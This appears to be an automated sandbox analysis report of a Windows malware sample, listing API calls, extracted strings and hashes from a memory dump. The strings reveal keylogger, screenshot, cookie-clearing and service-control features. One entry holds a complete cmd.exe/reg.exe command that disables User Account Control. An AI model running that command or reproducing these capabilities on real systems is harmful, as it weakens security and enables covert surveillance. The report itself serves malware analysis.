                                          • __alloca_probe_16.LIBCMT ref: 00444766
                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 004447C9
                                          • __freea.LIBCMT ref: 004447D6
                                            • Part of subcall function 0043F98C: RtlAllocateHeap.NTDLL(00000000,0043001C,?,?,00431747,?,?,0046C500,?,?,0040B6CB,0043001C,?,?,?,?), ref: 0043F9BE
                                          • __freea.LIBCMT ref: 004447DF
                                          • __freea.LIBCMT ref: 00444804
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                          • String ID:
                                          • API String ID: 3864826663-0
                                          • Opcode ID: 1ffa144e0095bbec8931e96d4ce059a1c473e9d7ef835e52d62b9c07a885e281
                                          • Instruction ID: 38c3e806ad7a3790cd52a8b2f1174a250ebfd45b4bb0c692cfbb473d4bf5d511
                                          • Opcode Fuzzy Hash: 1ffa144e0095bbec8931e96d4ce059a1c473e9d7ef835e52d62b9c07a885e281
                                          • Instruction Fuzzy Hash: E951E3B2610216AFFB258F60CC41FAB77A9EB85754F15462BFC04D7240EB3CDC5186A8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SendInput.USER32(00000001,00000001,0000001C,00000000,00000000), ref: 004152BC
                                          • SendInput.USER32(00000001,00000001,0000001C,00000000,00000000,00000000), ref: 004152DA
                                          • SendInput.USER32(00000001,00000001,0000001C,00000000,00000000,00000000), ref: 004152F7
                                          • SendInput.USER32(00000001,00000001,0000001C,00000000,00000000,00000000), ref: 00415309
                                          • SendInput.USER32(00000001,00000001,0000001C), ref: 00415320
                                          • SendInput.USER32(00000001,00000001,0000001C), ref: 0041533D
                                          • SendInput.USER32(00000001,00000001,0000001C), ref: 00415359
                                          • SendInput.USER32(00000001,?,0000001C,?), ref: 00415376
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: InputSend
                                          • String ID:
                                          • API String ID: 3431551938-0
                                          • Opcode ID: 6ea3bd92fbcbdd2c947ef4f77b83900cac562dc86d2446edd88204e41788982f
                                          • Instruction ID: e5dbb7d03718becac2084a9070c23a21e9d5ec01c3d02bef7d0779bca3f6509f
                                          • Opcode Fuzzy Hash: 6ea3bd92fbcbdd2c947ef4f77b83900cac562dc86d2446edd88204e41788982f
                                          • Instruction Fuzzy Hash: 96311E72D9025CA9FB109BD1CC46FFFBB78AF58B14F04000AE604AB1C2D6F995858BE5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 004108E2: RegOpenKeyExA.KERNELBASE(80000002,00000400,00000000,00020019,00000000,00000000), ref: 00410904
                                            • Part of subcall function 004108E2: RegQueryValueExA.KERNELBASE(00000000,?,00000000,00000000,?,00000400), ref: 00410923
                                            • Part of subcall function 004108E2: RegCloseKey.ADVAPI32(00000000), ref: 0041092C
                                          • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040A48B
                                          • PathFileExistsA.SHLWAPI(?), ref: 0040A498
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                          • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                          • API String ID: 1133728706-4073444585
                                          • Opcode ID: a701b72457d3b8d5ecc1e7ddda00a155a800f76ad45ae6f6e7df9f24864e4db5
                                          • Instruction ID: 0404135b92c53f53d421c2624bcb9c4f004ba22d2f22d8914b52eea1ab551b62
                                          • Opcode Fuzzy Hash: a701b72457d3b8d5ecc1e7ddda00a155a800f76ad45ae6f6e7df9f24864e4db5
                                          • Instruction Fuzzy Hash: D0218E31A102056ACB14F7F1CC5B9EE7768AF14309F44013EF901B71D3EA799A598A9A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 340e5c6f313d110d6c329e306ddbe221ce309103c65e366733ffc241553d2b4b
                                          • Instruction ID: 3e8c339fdf138c944f03ee87ae81e8163027b6b6686a5aa70f35362f2fa299d2
                                          • Opcode Fuzzy Hash: 340e5c6f313d110d6c329e306ddbe221ce309103c65e366733ffc241553d2b4b
                                          • Instruction Fuzzy Hash: B5113D765002157BDB206F729C0D92B7AACDF86762F1046ABFC19C7242DA3CCC05C679
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0040E7F2
                                          • int.LIBCPMT ref: 0040E805
                                            • Part of subcall function 0040B94C: std::_Lockit::_Lockit.LIBCPMT ref: 0040B95D
                                            • Part of subcall function 0040B94C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040B977
                                          • std::locale::_Getfacet.LIBCPMT ref: 0040E80E
                                          • std::_Facet_Register.LIBCPMT ref: 0040E845
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 0040E84E
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86C
                                          • __Init_thread_footer.LIBCMT ref: 0040E8AD
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetInit_thread_footerRegisterThrowstd::locale::_
                                          • String ID:
                                          • API String ID: 2409581025-0
                                          • Opcode ID: e7a0018a1746f9c7bf4673166abd77dce41b100f788e83672023b9d031f69d2e
                                          • Instruction ID: 03fd642756e00294ec4acf8aadaa37b4638c280f2e7f5516d862d72f379d1b29
                                          • Opcode Fuzzy Hash: e7a0018a1746f9c7bf4673166abd77dce41b100f788e83672023b9d031f69d2e
                                          • Instruction Fuzzy Hash: 7C21D332E001149BC714FB69D906A9E77B8DB44724B60417FE800B72D2EB78AD01879E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 00409642
                                            • Part of subcall function 00409E69: char_traits.LIBCPMT ref: 00409E79
                                          • wsprintfW.USER32 ref: 004096C3
                                          • SetEvent.KERNEL32(?,00000000), ref: 004096ED
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: EventLocalTimechar_traitswsprintf
                                          • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                          • API String ID: 3003339404-248792730
                                          • Opcode ID: ca61a9da6b4990f96a699c8070fe04a4003c35820f2ebf99f622e66c3a4d0d69
                                          • Instruction ID: dd13208d924f003fd79d0c2a63de2e9b71645c7df6fae77663c0b624719a6389
                                          • Opcode Fuzzy Hash: ca61a9da6b4990f96a699c8070fe04a4003c35820f2ebf99f622e66c3a4d0d69
                                          • Instruction Fuzzy Hash: 7021A4724001186AC728EBA5EC958FF77B9AF08355F00413FF847621D2EE78AA45D768
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00448EC1: _free.LIBCMT ref: 00448EEA
                                          • _free.LIBCMT ref: 004491C8
                                            • Part of subcall function 004401F5: RtlFreeHeap.NTDLL(00000000,00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000), ref: 0044020B
                                            • Part of subcall function 004401F5: GetLastError.KERNEL32(00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000,00000000), ref: 0044021D
                                          • _free.LIBCMT ref: 004491D3
                                          • _free.LIBCMT ref: 004491DE
                                          • _free.LIBCMT ref: 00449232
                                          • _free.LIBCMT ref: 0044923D
                                          • _free.LIBCMT ref: 00449248
                                          • _free.LIBCMT ref: 00449253
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 756ad40e604d71209bccb265ad132824995b9687c22d1463e70498a03dee4a72
                                          • Instruction ID: d0ac5bec4300d42e5daa1f0178d5914e2472619a840d7a0986f756f09d30ade7
                                          • Opcode Fuzzy Hash: 756ad40e604d71209bccb265ad132824995b9687c22d1463e70498a03dee4a72
                                          • Instruction Fuzzy Hash: A7115172940B04BAFA20BBB2CC47FCF779CAF00705F50081EB39AA6052DE7EB5244658
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetLastError.KERNEL32(?,?,004350AC,004321F2), ref: 004350C3
                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 004350D1
                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004350EA
                                          • SetLastError.KERNEL32(00000000,?,004350AC,004321F2), ref: 0043513C
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLastValue___vcrt_
                                          • String ID:
                                          • API String ID: 3852720340-0
                                          • Opcode ID: 0771ed93609d5e7a78759e24eab81c9c5a6dfd178299050cac477f2bce081d65
                                          • Instruction ID: a515c6194843fa53ce6413da374b9e5764b9e55810f12d35b037beed10178e82
                                          • Opcode Fuzzy Hash: 0771ed93609d5e7a78759e24eab81c9c5a6dfd178299050cac477f2bce081d65
                                          • Instruction Fuzzy Hash: EC01F532549B115EEA152E79AC4562B2654DB0D779F20223FF220511F1FE594C11564E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,0046C2E8,?,00404CA9,00000001,0046C2E8,00404C56,00000000,00000000,00000000), ref: 00405159
                                          • SetEvent.KERNEL32(?,?,00404CA9,00000001,0046C2E8,00404C56,00000000,00000000,00000000), ref: 00405165
                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,00404CA9,00000001,0046C2E8,00404C56,00000000,00000000,00000000), ref: 00405170
                                          • CloseHandle.KERNEL32(?,?,00404CA9,00000001,0046C2E8,00404C56,00000000,00000000,00000000), ref: 00405179
                                            • Part of subcall function 00416C80: GetLocalTime.KERNEL32(00000000), ref: 00416C9A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                          • String ID: Connection KeepAlive disabled$[WARNING]
                                          • API String ID: 2993684571-804309475
                                          • Opcode ID: 6700614dca504244a55bd319c10cf8dd84f4c90e38274ba8f930ec3cb829daee
                                          • Instruction ID: 60a08de37f047c10c4ebd60d286cc91250b6658f2aab9bb1a866a2a778ec74b8
                                          • Opcode Fuzzy Hash: 6700614dca504244a55bd319c10cf8dd84f4c90e38274ba8f930ec3cb829daee
                                          • Instruction Fuzzy Hash: E0F0C272900B407FDB103BB59C0EA7B7B98DB0135AF04057AFD41926E2DAB9D8548B9A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00416C80: GetLocalTime.KERNEL32(00000000), ref: 00416C9A
                                          • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00416769
                                          • PlaySoundW.WINMM(00000000,00000000), ref: 00416777
                                          • Sleep.KERNEL32(00002710), ref: 0041677E
                                          • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00416787
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: PlaySound$HandleLocalModuleSleepTime
                                          • String ID: Alarm has been triggered!$[ALARM]
                                          • API String ID: 614609389-1190268461
                                          • Opcode ID: a72f7bbe0ff649907879a8ec4559d77060f8c7e034846c054ca5bf069f778dcf
                                          • Instruction ID: 3dbfa3bc3acc833274b6e0f43357c326849184f6c95de14e1e3858e62b15b156
                                          • Opcode Fuzzy Hash: a72f7bbe0ff649907879a8ec4559d77060f8c7e034846c054ca5bf069f778dcf
                                          • Instruction Fuzzy Hash: D9E09222A00221379514376A6D0FD6F3D28CAC2B62B01016FFE08661829D944810C6FB
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • __allrem.LIBCMT ref: 00435926
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00435942
                                          • __allrem.LIBCMT ref: 00435959
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00435977
                                          • __allrem.LIBCMT ref: 0043598E
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004359AC
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                          • String ID:
                                          • API String ID: 1992179935-0
                                          • Opcode ID: 258e57513f608f90b5a19f46d233bda83a55d4bc811eeb716edfff4965c679b3
                                          • Instruction ID: 35372c1425533dcebe3bda436374fdb164c2facb18fb88ba24de970f82e87be5
                                          • Opcode Fuzzy Hash: 258e57513f608f90b5a19f46d233bda83a55d4bc811eeb716edfff4965c679b3
                                          • Instruction Fuzzy Hash: 4D810972600F06ABE724AE69CC42B6B73E8AF49778F24552FF411D7681E77CD9008798
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: __cftoe
                                          • String ID:
                                          • API String ID: 4189289331-0
                                          • Opcode ID: d08779da4da2b8c7503d64d17439e7d569a523021f011bdc61055c0fc5f488fa
                                          • Instruction ID: bcbe42ceaebb365c1ac6e2a5e9ed457d7b54482c9f0ea6a0937b1c10150bb98b
                                          • Opcode Fuzzy Hash: d08779da4da2b8c7503d64d17439e7d569a523021f011bdc61055c0fc5f488fa
                                          • Instruction Fuzzy Hash: E451E432D00205EADF249B69DC41BAF77A8AF4D324F60527FF91592282DB3DDD048A6C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,00415FB6,00000000), ref: 0041641A
                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,00415FB6,00000000), ref: 0041642E
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415FB6,00000000), ref: 0041643B
                                          • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00415FB6,00000000), ref: 0041644A
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415FB6,00000000), ref: 0041645C
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415FB6,00000000), ref: 0041645F
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Service$CloseHandle$Open$ControlManager
                                          • String ID:
                                          • API String ID: 221034970-0
                                          • Opcode ID: d4eaebdc15304b872416eaa7f8d04e900d6049d733b55bafd53bfd73d26ce288
                                          • Instruction ID: 4eedda638a80435df945b1a666cb81191fe5a480f3a20e792e67f186b8beea13
                                          • Opcode Fuzzy Hash: d4eaebdc15304b872416eaa7f8d04e900d6049d733b55bafd53bfd73d26ce288
                                          • Instruction Fuzzy Hash: 16F0F6315403187BD211AF65DC89DBF3B6CDB45B92F00002AFD0593192DF28CE4596F9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,00415EB6,00000000), ref: 00416585
                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00415EB6,00000000), ref: 00416599
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415EB6,00000000), ref: 004165A6
                                          • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,00415EB6,00000000), ref: 004165B5
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415EB6,00000000), ref: 004165C7
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415EB6,00000000), ref: 004165CA
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Service$CloseHandle$Open$ControlManager
                                          • String ID:
                                          • API String ID: 221034970-0
                                          • Opcode ID: 3436dafb5ab72bcd86b129217272098d71bfff533fa1ccb5049d0d6cd0b5ba5f
                                          • Instruction ID: f156ac7e468d3ae20af57b6ed191c57fcc92838d981ab40ed78c867a72fe8b74
                                          • Opcode Fuzzy Hash: 3436dafb5ab72bcd86b129217272098d71bfff533fa1ccb5049d0d6cd0b5ba5f
                                          • Instruction Fuzzy Hash: 6DF0C2315413187BD211AF65EC49EBF3BACDB45B92B00002AFE0992196DA38CE4596E9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00414906: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00414921
                                            • Part of subcall function 00414906: CreateCompatibleDC.GDI32(00000000), ref: 0041492D
                                          • SHCreateMemStream.SHLWAPI(00000000,00000000,png), ref: 004157C7
                                            • Part of subcall function 0041441B: GdipLoadImageFromStream.GDIPLUS(?,?), ref: 00414431
                                            • Part of subcall function 00414493: GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 004144A4
                                            • Part of subcall function 004179DC: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,00000000,00000000,?,004136FE), ref: 004179F9
                                          • DeleteFileW.KERNEL32(00000000,0000001B), ref: 00415858
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Create$File$GdipImageStream$CompatibleDeleteFromLoadSave
                                          • String ID: dat$image/png$png
                                          • API String ID: 1095564277-186023265
                                          • Opcode ID: 775667cc21e8ef688f989a89bfb0c9f6235a0d29cd1d95de21b8bca7321ddca0
                                          • Instruction ID: 0c36451510116b7bd957a4aa3b7b106e47bf9e8d8c5c7fe72891902c2c8ac275
                                          • Opcode Fuzzy Hash: 775667cc21e8ef688f989a89bfb0c9f6235a0d29cd1d95de21b8bca7321ddca0
                                          • Instruction Fuzzy Hash: 304172711183409BC314FB62C852EEFB3A9AF95358F00093FF446671E2EF385A48C69A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateThread.KERNEL32(00000000,00000000,0040884B,?,00000000,00000000), ref: 004087CA
                                          • CreateThread.KERNEL32(00000000,00000000,00408830,?,00000000,00000000), ref: 004087DA
                                          • CreateThread.KERNEL32(00000000,00000000,0040885A,?,00000000,00000000), ref: 004087E6
                                            • Part of subcall function 00409634: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 00409642
                                            • Part of subcall function 00409634: wsprintfW.USER32 ref: 004096C3
                                            • Part of subcall function 00409634: SetEvent.KERNEL32(?,00000000), ref: 004096ED
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CreateThread$EventLocalTimewsprintf
                                          • String ID: Offline Keylogger Started$[Info]
                                          • API String ID: 3534694722-3531117058
                                          • Opcode ID: 1e8aff02d5c109468fd494a4a84b3e52d0648772be4b1af5f9673befedfce18a
                                          • Instruction ID: e7dd77b1288fa42652556686635590a3b19cb298011fac88deeca58e0b290907
                                          • Opcode Fuzzy Hash: 1e8aff02d5c109468fd494a4a84b3e52d0648772be4b1af5f9673befedfce18a
                                          • Instruction Fuzzy Hash: 5711A7B21003083AD214B6668D86DBB3A5CDA9139CB40053FF985221D3EE785E59C6FA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00409634: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 00409642
                                            • Part of subcall function 00409634: wsprintfW.USER32 ref: 004096C3
                                            • Part of subcall function 00409634: SetEvent.KERNEL32(?,00000000), ref: 004096ED
                                            • Part of subcall function 00416C80: GetLocalTime.KERNEL32(00000000), ref: 00416C9A
                                          • CreateThread.KERNEL32(00000000,00000000,Function_00008830,?,00000000,00000000), ref: 0040942D
                                          • CreateThread.KERNEL32(00000000,00000000,Function_0000885A,?,00000000,00000000), ref: 00409439
                                          • CreateThread.KERNEL32(00000000,00000000,Function_00008869,?,00000000,00000000), ref: 00409445
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CreateThread$LocalTime$Eventwsprintf
                                          • String ID: Online Keylogger Started$[Info]
                                          • API String ID: 3546759147-3401407043
                                          • Opcode ID: 252a10f4c7db2c3d790c08ea6cd02ea1070b72bc27798e53e0cb27eb6ddf0f2a
                                          • Instruction ID: 55f70c683c1dd9f299002b3fa9371d2aabc85af949f207a7a15db3bb5bde523d
                                          • Opcode Fuzzy Hash: 252a10f4c7db2c3d790c08ea6cd02ea1070b72bc27798e53e0cb27eb6ddf0f2a
                                          • Instruction Fuzzy Hash: 5501C8A16002193AD62476764C86DBF7A6CCA81398F80057FFA85321C3D97D5C4A82FA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,0040C5FB,00000000,0046C578,00000001), ref: 0040D43B
                                          • CloseHandle.KERNEL32(0040C5FB), ref: 0040D44A
                                          • CloseHandle.KERNEL32(00000027), ref: 0040D44F
                                          Strings
                                          • C:\Windows\System32\cmd.exe, xrefs: 0040D436
                                          • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0040D431
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle$CreateProcess
                                          • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                          • API String ID: 2922976086-4183131282
                                          • Opcode ID: ef92d07ca1aae4fdf93b7244d02a4cef1616cfdac0d91f616d34c415f3e09b10
                                          • Instruction ID: 26fca9c7a1bbdca23175ff39a315bbad59b3fabc2693cff21f74514230984448
                                          • Opcode Fuzzy Hash: ef92d07ca1aae4fdf93b7244d02a4cef1616cfdac0d91f616d34c415f3e09b10
                                          • Instruction Fuzzy Hash: BDF012B290061C7FEB105AE9DC85EEFBB6CEB48795F100476F604E6011D5715D148AA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,000003E8,?,?,00405196), ref: 004051B1
                                          • CloseHandle.KERNEL32(?), ref: 00405207
                                          • SetEvent.KERNEL32(?), ref: 00405216
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CloseEventHandleObjectSingleWait
                                          • String ID: Connection timeout$[WARNING]
                                          • API String ID: 2055531096-1470507543
                                          • Opcode ID: 0ba4f2503bf5f0317bc10ecb581ea82cfaeb46762227d70d6f5b6137543dff9d
                                          • Instruction ID: 7da91c5eb563825218e032d44bddc69cdf30f244b65d1975d56df2ebc3a46463
                                          • Opcode Fuzzy Hash: 0ba4f2503bf5f0317bc10ecb581ea82cfaeb46762227d70d6f5b6137543dff9d
                                          • Instruction Fuzzy Hash: B801B131A41B40AFC721AF75884651BBBA4EF0530A700447EE5C3A6AA2CBB89404CF9A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041271D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ExecuteShell
                                          • String ID: /C $8E@$cmd.exe$open
                                          • API String ID: 587946157-914314769
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0040B836
                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040B875
                                            • Part of subcall function 004303A0: _Yarn.LIBCPMT ref: 004303BF
                                            • Part of subcall function 004303A0: _Yarn.LIBCPMT ref: 004303E3
                                          • std::bad_exception::bad_exception.LIBCMT ref: 0040B88D
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040B89B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throwstd::bad_exception::bad_exception
                                          • String ID: bad locale name
                                          • API String ID: 3706160523-1405518554
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 004028D8: std::_Xinvalid_argument.LIBCPMT ref: 004028DD
                                          • Sleep.KERNEL32(00000000,?), ref: 004045DB
                                            • Part of subcall function 0040471E: __EH_prolog.LIBCMT ref: 00404723
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: H_prologSleepXinvalid_argumentstd::_
